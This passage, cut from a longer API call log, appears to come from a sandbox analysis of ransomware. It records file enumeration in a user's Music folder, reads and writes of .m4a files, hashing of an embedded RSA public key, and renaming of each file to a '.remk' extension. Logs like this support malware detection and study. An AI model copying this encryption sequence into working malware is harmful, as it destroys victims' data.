Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6b8 [0234.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee748 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee718 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee760 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee700 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee718 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee730 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee760 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee748 | out: hHeap=0x630000) returned 1 [0234.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc080 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.228] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0x12161, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0x12161, lpOverlapped=0x0) returned 1 [0234.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.229] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12166, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.229] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.229] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.229] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.229] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.229] CloseHandle (hObject=0x640) returned 1 [0234.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0234.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.234] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\rM_fq7OOza3eITH8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\rm_fq7ooza3eith8.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\rM_fq7OOza3eITH8.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\rm_fq7ooza3eith8.m4a.remk")) returned 1 [0234.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.235] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0234.236] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ed6d280, ftCreationTime.dwHighDateTime=0x1d5dd8e, ftLastAccessTime.dwLowDateTime=0x545d5c40, ftLastAccessTime.dwHighDateTime=0x1d5df50, ftLastWriteTime.dwLowDateTime=0x545d5c40, ftLastWriteTime.dwHighDateTime=0x1d5df50, nFileSizeHigh=0x0, nFileSizeLow=0x144a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y1jISSChT2WEecUSrE0s.m4a", cAlternateFileName="Y1JISS~1.M4A")) returned 1 [0234.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0234.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.236] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\Y1jISSChT2WEecUSrE0s.m4a") returned=".m4a" [0234.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\Y1jISSChT2WEecUSrE0s.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\y1jisscht2weecusre0s.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.237] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=83108) returned 1 [0234.237] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.239] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1447e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.239] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.241] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.241] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x144a4, lpOverlapped=0x0) returned 1 [0234.242] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.242] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.242] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.242] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.243] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.243] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.243] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.243] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.243] GetLastError () returned 0x0 [0234.243] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.243] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.243] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.243] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.243] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x144a0) returned 0x37c4278 [0234.244] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc080 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc0c8 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6b8 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee748 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.244] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee748 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee748 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee700 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee6e8 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee748 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.245] GetCurrentThreadId () returned 0x314 [0234.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2dd0 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.246] GetCurrentThreadId () returned 0x314 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee748 [0234.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: 